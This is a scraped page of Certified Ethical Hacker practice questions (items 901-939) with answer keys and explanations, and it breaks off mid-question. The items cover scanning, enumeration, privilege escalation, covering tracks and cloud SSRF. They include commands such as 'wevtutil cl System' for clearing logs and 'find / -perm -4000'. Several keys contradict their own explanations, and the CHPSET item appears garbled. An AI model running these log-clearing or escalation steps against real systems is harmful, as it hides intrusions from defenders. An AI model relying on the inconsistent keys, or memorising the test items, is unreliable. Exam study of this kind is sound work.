HTTP/1.1…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-a-web-server-log-and-sees-the-following-r-vknfi"},{"@type":"ListItem","position":956,"name":"An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employe…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-uses-the-social-engineering-toolkit-set-to-clo-61cqb"},{"@type":"ListItem","position":957,"name":"During a security assessment, an analyst runs 'enum4linux -a 10.0.0.5' and obtains a list of users, shares, and OS infor…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-security-assessment-an-analyst-runs-enum4linux-a-a011m"},{"@type":"ListItem","position":958,"name":"An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-observes-the-following-output-from-wireshark-a-t-n1e7w"},{"@type":"ListItem","position":959,"name":"A penetration tester wants to identify live hosts on a large IP range without generating excessive network traffic. Whic…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-wants-to-identify-live-hosts-on-a-large-0wfr5"},{"@type":"ListItem","position":960,"name":"A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effecti…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-company-wants-to-protect-its-network-from-mac-flooding-att-x8889"},{"@type":"ListItem","position":961,"name":"During a penetration test, an analyst runs the command 'snmpwalk -v2c -c public 192.168.1.10' and receives a large amoun…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-an-analyst-runs-the-command-snmp-9x7j3"},{"@type":"ListItem","position":962,"name":"During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replica…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-forensic-investigation-an-analyst-finds-a-suspicio-77ucm"},{"@type":"ListItem","position":963,"name":"A security analyst runs `nmap -sS -sV -A 192.168.1.100` and obtains open ports and service versions. However, the analys…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-runs-nmap-ss-sv-a-192-168-1-100-and-h7bc4"},{"@type":"ListItem","position":964,"name":"Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-characteristics-of-a-dns-ampl-g3pwo"},{"@type":"ListItem","position":965,"name":"Which type of malware is characterized by self-replication and spreading across networks without needing a host file?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-type-of-malware-is-characterized-by-self-replication-a-zei7n"},{"@type":"ListItem","position":966,"name":"An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-attempts-to-exploit-a-web-application-by-sending-ta4mf"},{"@type":"ListItem","position":967,"name":"During a reconnaissance phase, a penetration tester uses Shodan to search for devices with a specific open port. Which o…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-reconnaissance-phase-a-penetration-tester-uses-sho-ogu2g"},{"@type":"ListItem","position":968,"name":"Which TWO of the following tools are capable of cracking password hashes offline? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-tools-are-capable-of-cracking-pas-2cpz1"},{"@type":"ListItem","position":969,"name":"Which THREE of the following are common indicators of a buffer overflow vulnerability?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-common-indicators-of-a-buff-edllc"},{"@type":"ListItem","position":970,"name":"Which THREE of the following are common techniques used during the footprinting phase? (Choose three.)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-common-techniques-used-duri-nug0d"},{"@type":"ListItem","position":971,"name":"A security analyst wants to discover all DNS records associated with a domain without triggering a full zone transfer. W…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-wants-to-discover-all-dns-records-associa-vdpa3"},{"@type":"ListItem","position":972,"name":"Which of the following tools is specifically used to enumerate SMB shares and retrieve file listings from Windows system…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-is-specifically-used-to-enumera-pykwn"},{"@type":"ListItem","position":973,"name":"A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-team-suspects-a-session-hijacking-attack-the-ana-hjpyn"},{"@type":"ListItem","position":974,"name":"During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a passwo…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-social-engineering-assessment-an-attacker-calls-a-no5gi"},{"@type":"ListItem","position":975,"name":"A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP ech…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-receives-an-alert-indicating-that-a-host-vbkrz"}]}

Certified Ethical Hacker CEH (CEH) — Questions 901975

1010 questions total · 14pages · All types, answers revealed

Page 12

Page 13 of 14

Page 14
901
Multi-Selecthard

Which THREE of the following are valid techniques for covering tracks after compromising a system? (Select 3 correct answers)

Select 3 answers
A.Clearing event logs using wevtutil
B.Exploiting SUID binaries to gain root
C.Installing a rootkit to hide malicious processes
D.Using timestomp to modify file timestamps
E.Disabling Windows Defender via Group Policy
AnswersA, C, D

Clearing logs removes evidence of activity.

Why this answer

A is correct because wevtutil is a Windows command-line utility used to manage event logs. After compromising a system, an attacker can use 'wevtutil cl' followed by a log name (e.g., 'wevtutil cl System') to clear specific event logs, thereby erasing evidence of their activities. This is a direct and common technique for covering tracks by removing forensic artifacts.

Exam trap

EC-Council often tests the distinction between privilege escalation (gaining higher access) and covering tracks (hiding evidence), causing candidates to mistakenly select SUID exploitation as a track-covering technique.

902
Multi-Selecteasy

Which TWO of the following are valid port states that Nmap can report? (Select 2)

Select 2 answers
A.Unknown
B.Secured
C.Open
D.Filtered
E.Blocked
AnswersC, D

An open port has a service listening and accepting connections.

Why this answer

Nmap reports 'Open' when a port responds to a probe (e.g., SYN, ACK, or connect scan) with a positive acknowledgment, indicating a service is actively listening. This is one of the six fundamental port states defined in Nmap's output, directly derived from the TCP/IP protocol behavior during the scan.

Exam trap

The trap here is that candidates confuse 'filtered' with generic terms like 'blocked' or 'secured', or assume Nmap uses a catch-all 'unknown' state, when in fact Nmap has a precise, limited set of six states that must be memorized for the CEH exam.

903
Multi-Selecteasy

Which TWO of the following are enumeration techniques?

Select 2 answers
A.Buffer overflow
B.Cross-site scripting
C.LDAP enumeration
D.SQL injection
E.SMTP enumeration
AnswersC, E

LDAP enumeration queries directory services for information.

Why this answer

Options C and D are correct. LDAP enumeration and SMTP enumeration are both enumeration techniques used to gather information about users, systems, or services.

904
MCQeasy

A company wants to test the security of its web application by simulating attacks from an external perspective. They have no prior knowledge of the internal network or application architecture. Which type of test should they perform?

A.Black-box test
B.White-box test
C.Red team engagement
D.Gray-box test
AnswerA

Black-box test simulates an external attacker with no prior knowledge.

Why this answer

A black-box test is the correct choice because the company has no prior knowledge of the internal network or application architecture. This simulates an external attacker with zero insider information, testing the application from an outsider's perspective without access to source code, network diagrams, or credentials. The test relies solely on publicly available information and direct interaction with the application's interfaces.

Exam trap

The trap here is that candidates often confuse 'black-box test' with 'red team engagement', but red team engagements are broader and may include internal knowledge or physical attacks, whereas a black-box test strictly limits information to what is publicly available.

How to eliminate wrong answers

Option B (White-box test) is wrong because it requires full knowledge of the internal architecture, source code, and network design, which contradicts the 'no prior knowledge' condition. Option C (Red team engagement) is wrong because it is a broader, goal-oriented simulation that often includes social engineering and physical breaches, not solely an external web application test without internal knowledge. Option D (Gray-box test) is wrong because it involves partial knowledge (e.g., credentials or API documentation), which the company explicitly lacks.

905
MCQmedium

A network administrator notices an unusually high number of half-open TCP connections to the company's web server. The source IPs are spoofed. Which type of attack is MOST likely occurring?

A.Smurf attack
B.UDP flood
C.SYN flood
D.ICMP flood
AnswerC

Half-open TCP connections indicate a SYN flood.

Why this answer

A SYN flood sends many SYN packets without completing the handshake, exhausting server resources.

906
MCQhard

A security team detects unusual outbound traffic from a host that appears to be a reverse shell. Which of the following Nmap features would be MOST effective for identifying the service running on the listening port of the command-and-control server?

A.UDP scan using the -sU flag
B.Nmap Scripting Engine (NSE) with the http-enum script
C.OS fingerprinting using the -O flag
D.Service version detection using the -sV flag
AnswerD

-sV probes open ports and compares responses to identify service names and versions, which is ideal for identifying a reverse shell service.

Why this answer

Option D is correct because the -sV flag instructs Nmap to perform service version detection by probing open ports and analyzing the responses to determine the exact application and version running on the listening port. In a reverse shell scenario, identifying the service (e.g., a specific SSH, HTTP, or custom listener) on the C2 server is critical for understanding the attack vector and planning remediation.

Exam trap

The trap here is that candidates confuse OS fingerprinting (-O) with service version detection (-sV), thinking that identifying the OS will reveal the service, but the CEH exam emphasizes that -sV is the dedicated flag for service and version identification on listening ports.

How to eliminate wrong answers

Option A is wrong because a UDP scan (-sU) is used to discover UDP services, but reverse shells typically use TCP for reliable communication, and UDP scanning would not effectively identify a TCP-based listening service. Option B is wrong because the http-enum script is designed to enumerate directories and files on HTTP/HTTPS services, but the C2 server may not be running a web service, and this script does not perform general service identification. Option C is wrong because OS fingerprinting (-O) determines the operating system of the target host, not the specific service or application version running on a listening port, which is irrelevant for identifying the C2 service.

907
MCQeasy

Which of the following is the correct order of phases in the system hacking methodology known as CHPSET?

A.Spying, Erasing, Cracking, Hiding, Privilege escalation, Executing
B.Privilege escalation, Cracking, Hiding, Executing, Spying, Erasing
C.Executing, Cracking, Spying, Hiding, Privilege escalation, Erasing
D.Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing
AnswerD

CHPSET order: Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing.

Why this answer

The CHPSET methodology in system hacking stands for Cracking, Hiding, Privilege escalation, Executing, Spying, Erasing. Option D correctly lists these phases in order: Cracking (password cracking), Hiding (covering tracks), Privilege escalation (gaining higher access), Executing (running malicious code), Spying (monitoring activity), and Erasing (removing evidence). This sequence follows the logical progression from initial access to maintaining access and finally covering tracks.

Exam trap

The trap here is that candidates often confuse the order of Hiding and Privilege escalation, mistakenly thinking hiding occurs first, but in CHPSET, hiding (covering tracks) happens after privilege escalation to conceal the elevated access and subsequent actions.

How to eliminate wrong answers

Option A is wrong because it starts with Spying and Erasing, which are later phases, and misplaces Cracking after Erasing; the correct order begins with Cracking. Option B is wrong because it places Privilege escalation and Cracking before Hiding, but Hiding (covering tracks) typically occurs after privilege escalation and execution to conceal the attacker's presence. Option C is wrong because it starts with Executing and Cracking, but Cracking must occur before execution to obtain credentials for access, and Spying is placed too early before privilege escalation.

908
MCQeasy

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

A.Social Engineering Toolkit (SET)
B.Nmap
C.Wireshark
D.Ettercap
AnswerA

SET includes credential harvesting modules that clone legitimate sites.

Why this answer

The Social Engineering Toolkit (SET) has a website attack vector for cloning login pages and can interface with Metasploit for payload delivery.

909
MCQmedium

A security analyst observes the following log entry on a web server: 'GET /?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1'. This request appears to originate from a compromised web application. Which cloud attack technique is being attempted?

A.Server-Side Request Forgery (SSRF)
B.SQL Injection
C.Container escape
D.Cross-Site Scripting (XSS)
AnswerA

Correct. The request to the cloud metadata service is a classic SSRF attack to obtain instance credentials.

Why this answer

The IP address 169.254.169.254 is the AWS instance metadata service endpoint. An attacker using a Server-Side Request Forgery (SSRF) vulnerability can force the server to request this URL and retrieve sensitive instance metadata, such as IAM credentials.

910
MCQhard

An attacker sends a TCP SYN packet to a port and receives a TCP RST packet in response. According to Nmap's port state classification, what is the state of this port?

A.Filtered
B.Unfiltered
C.Closed
D.Open
AnswerC

A closed port responds with RST.

Why this answer

When Nmap sends a TCP SYN packet to a port and receives a TCP RST packet in response, it indicates that the port is reachable but no service is listening on it. Per RFC 793, a RST is sent when a SYN arrives on a closed port, so Nmap classifies this port as 'closed'.

Exam trap

EC-Council often tests the misconception that a RST response means the port is 'filtered' or 'open', but the correct interpretation per Nmap's classification is that a RST directly indicates a 'closed' port.

How to eliminate wrong answers

Option A is wrong because 'filtered' means the probe was dropped or blocked by a firewall or packet filter (no response or ICMP unreachable), not a TCP RST. Option B is wrong because 'unfiltered' is a special state used only in ACK scans (e.g., -sA) where the port is reachable but its open/closed status cannot be determined; it does not apply to a SYN scan receiving a RST. Option D is wrong because an 'open' port would respond with a SYN-ACK, not a RST.

911
MCQmedium

Refer to the exhibit. An analyst runs an Nmap scan and finds these services. Which known vulnerability is most likely to be successfully exploited?

A.CVE-2021-41773 (Apache Path Traversal)
B.CVE-2017-5638 (Struts2 RCE)
C.CVE-2014-0160 (Heartbleed)
D.CVE-2020-1472 (Zerologon)
AnswerA

Apache 2.4.49 is vulnerable to CVE-2021-41773, a path traversal and remote code execution vulnerability.

912
MCQmedium

After compromising a system, an attacker wants to erase their tracks. They clear the Windows Event Logs using `wevtutil cl` commands. However, the logs are forwarded to a remote SIEM. Which covering tracks technique would be MOST effective to avoid detection?

A.Modify specific event log entries to remove evidence of their actions
B.Disable Windows Event Log service (EventLog)
C.Use a rootkit to hide files and processes
D.Encrypt the log files
AnswerA

Selective modification can remove incriminating entries while keeping normal logging, reducing suspicion.

Why this answer

If logs are forwarded to a remote SIEM, local log deletion will still leave traces in the SIEM. A better approach is to manipulate specific log entries (e.g., modify or delete only the incriminating entries) to avoid raising alert on bulk deletion. However, the best among options is to modify logs selectively.

913
MCQhard

During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?

A.The file is a worm because it connects to a remote IP
B.The file is likely a packed trojan that evades signature-based detection
C.The file is benign because static analysis found no indicators
D.The file is a false positive and the sandbox environment is compromised
AnswerB

Lack of strings and zero AV detections suggest packing; sandbox behavior confirms malice.

Why this answer

The binary evades static analysis (packed, no strings, undetected by AV) but exhibits malicious behavior in dynamic analysis (network connection, process injection). This suggests it is a packed or obfuscated trojan.

914
Multi-Selecthard

Which THREE of the following are methods for covering tracks after compromising a system? (Select 3)

Select 3 answers
A.Installing a rootkit to hide files and processes
B.Escalating privileges to SYSTEM
C.Disabling antivirus software
D.Using steganography to hide stolen data in images
E.Clearing event logs
AnswersA, D, E

Rootkits help hide evidence.

Why this answer

Covering tracks includes log manipulation (clearing or modifying logs), using rootkits to hide processes/files, and steganography to hide malicious data. Disabling antivirus is more of an evasion technique during the attack, not specifically covering tracks. Privilege escalation is a different phase.

915
Multi-Selecteasy

A penetration tester successfully gains access to a Linux server as a low-privilege user. The goal is to escalate to root. Which THREE methods could the tester use to achieve privilege escalation?

Select 3 answers
A.Enumerate SUID binaries with 'find / -perm -4000'
B.Exploit a vulnerable SUID binary to spawn a root shell
C.Use 'sudo -l' to list allowed commands and exploit misconfigurations
D.Check /etc/shadow for weak password hashes
E.Run a local kernel exploit that matches the kernel version
AnswersB, C, E

If a SUID binary has a vulnerability, it can be used to execute commands as root.

Why this answer

Options B, C, and D are correct. Exploiting SUID binaries, kernel exploits, and sudo misconfigurations are common Linux privilege escalation techniques. A and E are enumeration steps, not escalation methods.

916
Multi-Selecthard

Which THREE of the following attacks target cryptographic weaknesses?

Select 3 answers
A.Downgrade attack
B.Replay attack
C.Cross-site scripting
D.Birthday attack
E.SQL injection
AnswersA, B, D

Forces a system to use weaker, more vulnerable encryption.

Why this answer

A downgrade attack is correct because it forces a system to use a weaker, less secure cryptographic protocol or algorithm (e.g., forcing TLS 1.2 down to SSL 3.0 or using export-grade ciphers). This exploits the cryptographic weakness of the older protocol, making it easier for an attacker to decrypt or manipulate the communication. The attack directly targets the cryptographic strength of the negotiated security parameters.

Exam trap

The trap here is that candidates often confuse 'replay attack' (option B) as purely a cryptographic attack, but it is actually a protocol-level attack that can succeed even with strong cryptography if no nonce or timestamp is used, while the Birthday attack (option D) is a direct cryptographic weakness based on hash collision probability.

917
MCQmedium

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

A.Cross-Site Scripting (XSS)
B.Directory traversal
C.Server-Side Request Forgery (SSRF)
D.SQL injection
AnswerA

Reflecting user input (User-Agent) without sanitization allows XSS.

Why this answer

Reflecting unsanitized input in HTTP headers can lead to reflected XSS.

918
MCQmedium

Which cloud security assessment tool is specifically designed to audit AWS environments against best practices and CIS benchmarks?

A.Pacu
B.ScoutSuite
C.Nessus
D.Metasploit
AnswerB

ScoutSuite performs cloud security audits.

Why this answer

ScoutSuite is an open-source tool that audits cloud environments (AWS, Azure, GCP) for security misconfigurations.

919
MCQeasy

A security analyst runs the command `nbtstat -A 192.168.1.105` on a Windows machine. What information is the analyst most likely trying to gather?

A.The NetBIOS name table and MAC address of the remote host
B.The LDAP directory structure of the domain
C.The SNMP community strings of the target
D.The SMB shares available on the remote host
AnswerA

nbtstat -A shows NetBIOS names, type, and MAC address for the given IP.

Why this answer

The `nbtstat -A` command performs a NetBIOS name table lookup against the specified IP address using the NetBIOS over TCP/IP (NBT) protocol. It returns the remote host's NetBIOS name table, which includes registered names and services, along with the MAC address of the network adapter. This is a standard enumeration technique to identify the hostname, logged-in user, and other NetBIOS-related information.

Exam trap

The trap here is that candidates confuse `nbtstat -A` with `net view` or `nbtstat -a`, mistakenly thinking it lists SMB shares or uses a hostname instead of an IP address, when in fact `-A` specifically targets a remote IP and returns the NetBIOS name table and MAC.

How to eliminate wrong answers

Option B is wrong because LDAP directory structure is queried using LDAP-specific tools like `ldapsearch` or `nslookup` with SRV records, not `nbtstat`. Option C is wrong because SNMP community strings are obtained via SNMP enumeration tools like `snmpwalk` or `snmpenum`, not through NetBIOS commands. Option D is wrong because SMB shares are enumerated using commands like `net view` or tools like `smbclient`, while `nbtstat` only reveals NetBIOS names and MAC addresses, not share listings.

920
MCQmedium

During a penetration test, you capture the following 4-way handshake using airodump-ng. Which tool would you use to attempt a dictionary attack to recover the WPA2 passphrase?

A.Reaver
B.Aircrack-ng
C.Kismet
D.John the Ripper
AnswerB

Aircrack-ng can perform dictionary attacks on captured 4-way handshakes.

Why this answer

Aircrack-ng is the standard tool for cracking WPA/WPA2 handshakes using dictionary attacks.

921
Multi-Selecteasy

Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)

Select 2 answers
A.Remains constant in code to ensure replication
B.Mutates its code to evade signature detection
C.Uses encryption with a variable key
D.Spreads via network shares
E.Resides in the boot sector of a hard drive
AnswersB, C

Polymorphic viruses change their code pattern each time they replicate.

Why this answer

Option B is correct because a polymorphic virus mutates its code—typically by using a mutation engine—while preserving its original functionality. This mutation changes the virus's signature each time it replicates, allowing it to evade signature-based detection by antivirus software. Option C is correct because polymorphic viruses commonly use encryption with a variable key; the virus body is encrypted, and the decryption routine mutates, so the encrypted payload looks different with each infection.

Exam trap

The trap here is that candidates often confuse 'polymorphic' with 'metamorphic' or assume that all viruses that use encryption are polymorphic, but the key distinction is that polymorphic viruses use a variable key and mutate the decryption routine, whereas simple encrypted viruses use a fixed key and do not change their decryptor.

922
MCQmedium

Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?

A.Ettercap
B.Wireshark
C.Nmap
D.macof
AnswerD

macof is designed for MAC flooding attacks.

Why this answer

macof is a tool that floods a switch with random MAC addresses to overflow the CAM table, causing the switch to operate as a hub.

923
MCQmedium

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

A.Using a list of compromised credentials from a data breach
B.Trying many passwords for a single account
C.Trying a few common passwords against many accounts
D.Using automated tools to bypass CAPTCHA
AnswerC

Password spraying targets many accounts with a small set of common passwords to avoid lockouts.

Why this answer

Password spraying uses a few common passwords against many accounts to avoid account lockout.

924
MCQmedium

Which Google dork would a penetration tester use to find login pages that are indexed by Google?

A.filetype:xls username password
B.intitle:"index of"
C.inurl:login
D.site:example.com intext:password
AnswerC

This searches for pages with 'login' in the URL, typically login forms.

Why this answer

Option C is correct because the Google dork 'inurl:login' specifically searches for URLs containing the word 'login', which commonly appear in login page paths (e.g., /login.php, /login.aspx). This allows a penetration tester to quickly identify indexed login portals for further reconnaissance, such as testing for default credentials or brute-force attacks.

Exam trap

The trap here is that candidates often confuse 'inurl:login' with 'intitle:login' or 'intext:login', but 'inurl:' is the precise operator for finding login pages by their URL structure, while 'intitle:' and 'intext:' target page titles and body content, respectively, which are less reliable for this specific purpose.

How to eliminate wrong answers

Option A is wrong because 'filetype:xls username password' targets Excel files that may contain credentials, not login pages. Option B is wrong because 'intitle:"index of"' reveals directory listings (e.g., open Apache indexes), not login pages. Option D is wrong because 'site:example.com intext:password' searches for pages containing the word 'password' in their body text, which could be any page (e.g., password reset forms or help pages), not specifically login pages.

925
MCQmedium

In a cloud environment, which of the following is an example of a Server-Side Request Forgery (SSRF) attack?

A.An attacker exploits a web application to send HTTP requests from the server to an internal metadata endpoint
B.An attacker intercepts traffic between a load balancer and backend servers
C.An attacker uses a SQL injection to extract database contents
D.An attacker uploads a malicious file to an S3 bucket that executes code on the server
AnswerA

SSRF allows the attacker to use the server as a proxy to access internal systems like the cloud metadata service (169.254.169.254).

Why this answer

SSRF occurs when an attacker tricks the server into making requests to internal resources, such as a cloud metadata service, to obtain credentials.

926
Multi-Selecthard

Which TWO of the following are examples of hybrid password attacks? (Select 2 correct answers)

Select 2 answers
A.Using a wordlist to try every possible password in the list
B.Using a dictionary file and appending random numbers to each word
C.Using a set of rules with Hashcat to modify dictionary words (e.g., leet speak substitutions)
D.Generating all possible character combinations up to a certain length
E.Cracking passwords using precomputed rainbow tables
AnswersB, C

This combines dictionary with brute force (numbers) – a hybrid.

Why this answer

Option B is correct because a hybrid password attack combines a dictionary or wordlist with additional modifications, such as appending random numbers to each word. This approach leverages common password patterns where users often add digits to a base word to meet complexity requirements, making it more effective than a simple dictionary attack.

Exam trap

EC-Council often tests the distinction between hybrid attacks and other attack types, and the trap here is that candidates may confuse a dictionary attack (Option A) with a hybrid attack, or mistake brute-force (Option D) or rainbow tables (Option E) as hybrid methods, when in fact hybrid attacks specifically combine a dictionary with rule-based modifications or appendages.

927
Multi-Selecthard

During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

Select 3 answers
A.It functions as a remote access Trojan (RAT)
B.It is classified as a Trojan horse
C.It is a polymorphic virus that changes its signature each time it runs
D.It is a worm that replicates across the network automatically
E.It is capable of exfiltrating data to a remote server
AnswersA, B, E

Opens a backdoor and sends info, typical RAT behavior.

Why this answer

This is a Trojan that acts as a RAT (remote access Trojan). It uses a backdoor to allow remote control and data exfiltration. The other options: polymorphic viruses change code, and worms self-propagate without user action.

928
Multi-Selecthard

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Select 3 answers
A.Implementing Multi-Factor Authentication (MFA)
B.Using HTTP GET requests for state-changing operations
C.Setting SameSite cookies to Lax or Strict
D.Including a unique CSRF token in each request
E.Validating the Origin or Referer header
AnswersC, D, E

SameSite attribute prevents cookies from being sent in cross-site requests.

Why this answer

SameSite cookies restrict cross-origin requests. CSRF tokens provide a unique per-request secret. Custom headers (e.g., X-Requested-With) can be checked by the server.

Double Submit Cookies can also be used but is less common. MFA does not prevent CSRF.

929
Multi-Selectmedium

Which TWO of the following tools are used for cloud security auditing or exploitation?

Select 2 answers
A.ScoutSuite
B.John the Ripper
C.Pacu
D.Nessus
E.Aircrack-ng
AnswersA, C

ScoutSuite is a security auditing tool for cloud environments.

Why this answer

ScoutSuite is an auditing tool and Pacu is an exploitation framework for cloud environments.

930
MCQeasy

A penetration tester discovers that a target Windows system has port 445 open and responds to SMB requests. Which tool should the tester use to enumerate users, shares, and OS information from this system?

A.Nikto
B.Hydra
C.Nmap
D.enum4linux
AnswerD

Correct: enum4linux extracts SMB information like users, shares, and OS details.

Why this answer

enum4linux is a tool specifically designed to enumerate information from Windows and Samba systems via SMB. It leverages the SMB protocol to extract users, shares, OS details, and other system information from a target with port 445 open, making it the correct choice for this scenario.

Exam trap

The trap here is that candidates may choose Nmap because it is a versatile tool that can perform SMB enumeration with scripts, but the CEH exam expects the specialized tool (enum4linux) for this specific task, as Nmap is primarily a port scanner and not the dedicated enumeration tool.

How to eliminate wrong answers

Option A is wrong because Nikto is a web server scanner that tests for vulnerabilities in HTTP/HTTPS services, not for SMB enumeration. Option B is wrong because Hydra is a password brute-forcing tool used for online attacks against various services, not for passive enumeration of users, shares, or OS information. Option C is wrong because while Nmap can detect open ports and perform basic SMB enumeration via scripts (e.g., smb-enum-shares), it is not the dedicated tool for comprehensive SMB enumeration; enum4linux is purpose-built for this task.

931
MCQeasy

Which SNMP community string is typically used for read-only access by default on many devices?

A.snmp
B.private
C.admin
D.public
AnswerD

'public' is the default read-only community string.

Why this answer

The default read-only community string in SNMPv1 and SNMPv2c is 'public'. This string acts as a password that allows an SNMP manager to query device MIB objects for monitoring purposes without making configuration changes. It is widely documented in RFC 1157 and is the standard default across most networking equipment.

Exam trap

The trap here is that candidates often confuse 'public' with 'private', mistakenly thinking 'private' is the read-only string, when in fact 'private' is the default read-write community string.

How to eliminate wrong answers

Option A is wrong because 'snmp' is not a standard default community string; it is occasionally used as a custom string but never as a default. Option B is wrong because 'private' is the default read-write community string, granting write access to modify device configurations, not read-only. Option C is wrong because 'admin' is a common administrative username, not an SNMP community string; SNMP community strings are separate from device login credentials.

932
MCQeasy

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

A.SQLMap
B.Nmap
C.Burp Suite
D.John the Ripper
AnswerA

SQLMap is designed for automated SQL injection.

Why this answer

SQLMap is the industry-standard tool for automating SQL injection detection and exploitation.

933
MCQmedium

A penetration tester uses the tool Reaver to target a Wi-Fi network. What vulnerability is the tester attempting to exploit?

A.WPA2 4-way handshake capture
B.WPS PIN brute-force weakness
C.Weak WEP encryption keys
D.RADIUS authentication bypass
AnswerB

Reaver performs a brute-force attack on the WPS PIN (typically 8 digits) to recover PSK.

Why this answer

Reaver is a tool specifically designed to exploit the WPS (Wi-Fi Protected Setup) PIN brute-force vulnerability. It targets the WPS registrar's lack of rate-limiting and the fact that the PIN is split into two halves (first half 4 digits, second half 3 digits with a checksum), allowing an attacker to recover the WPS PIN and subsequently the WPA2 pre-shared key in a matter of hours.

Exam trap

EC-Council often tests the distinction between WPS PIN brute-force (Reaver) and WPA2 handshake capture (aircrack-ng), so candidates mistakenly associate any wireless attack with handshake capture rather than recognizing the specific tool-to-vulnerability mapping.

How to eliminate wrong answers

Option A is wrong because capturing a WPA2 4-way handshake is performed with tools like airodump-ng or Wireshark, not Reaver; Reaver does not capture handshakes but instead brute-forces the WPS PIN. Option C is wrong because weak WEP encryption keys are exploited using tools like aircrack-ng or WEP cracking techniques (e.g., ARP replay attacks), not Reaver, which is designed for WPS attacks on WPA/WPA2 networks. Option D is wrong because RADIUS authentication bypass typically targets enterprise 802.1X networks using tools like asleap or hostapd-wpe, not Reaver, which operates on the WPS protocol used in personal (PSK) mode.

934
MCQmedium

An IoT device uses MQTT for communication. An attacker intercepts MQTT packets and observes that the publish messages are not encrypted and contain plaintext sensor data. Which of the following is the BEST recommendation to secure MQTT traffic?

A.Base64-encode the payload
B.Switch to CoAP protocol
C.Use MQTT over TLS
D.Implement a VPN on the device
AnswerC

Correct: MQTT over TLS (MQTTS) encrypts the connection, preventing eavesdropping.

Why this answer

MQTT itself does not provide encryption; using TLS (MQTT over TLS) encrypts the entire communication channel, protecting data in transit.

935
MCQhard

After gaining initial access to a Linux server, a penetration tester wants to maintain persistence by creating a backdoor. The tester decides to replace a common system binary with a trojanized version. Which of the following techniques is MOST likely to evade detection by file integrity monitoring (FIM) systems?

A.Replace the binary with a modified version that has the same file size and timestamp
B.Place the backdoor in a directory that is excluded from FIM monitoring
C.Use steganography to hide the backdoor inside an image file
D.Use a kernel-level rootkit that intercepts read operations to present the original binary's content
AnswerD

A rootkit can hook system calls to return the original file content when FIM reads it, while the modified binary runs.

Why this answer

Rootkits at the kernel level can intercept system calls and hide file changes from FIM. DKOM rootkits modify kernel objects to hide processes and files, making detection difficult.

936
Multi-Selectmedium

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

Select 2 answers
A.HTTP flood
B.Smurf attack
C.SYN flood
D.UDP flood
E.Slowloris
AnswersA, E

HTTP flood sends many HTTP GET/POST requests, overloading the application.

Why this answer

Slowloris keeps many connections open by sending partial HTTP requests, and HTTP flood sends a high volume of legitimate-looking HTTP requests. Both target the application layer.

937
MCQmedium

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA

Repeater allows sending and resending individual requests with manual modifications.

Why this answer

Burp Repeater is designed for manually crafting and resending requests to see individual responses, ideal for testing parameter handling.

938
MCQmedium

A cloud security engineer discovers that an S3 bucket named 'acme-backups' is accessible to anyone with the bucket URL. The bucket contains sensitive customer data. Which AWS shared responsibility model component does this misconfiguration primarily violate?

A.AWS is responsible for physical security of data centers
B.The customer is responsible for patching the S3 service
C.The customer is responsible for configuring access controls and permissions
D.AWS is responsible for network infrastructure; the customer for data classification
AnswerC

Correct. S3 bucket policies and permissions are customer-managed security controls.

Why this answer

Under the AWS shared responsibility model, the customer is responsible for configuring S3 bucket policies and access controls. The misconfiguration is a customer-side issue, not an infrastructure vulnerability.

939
Multi-Selecthard

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

Select 3 answers
A.Directory traversal
B.Credential stuffing
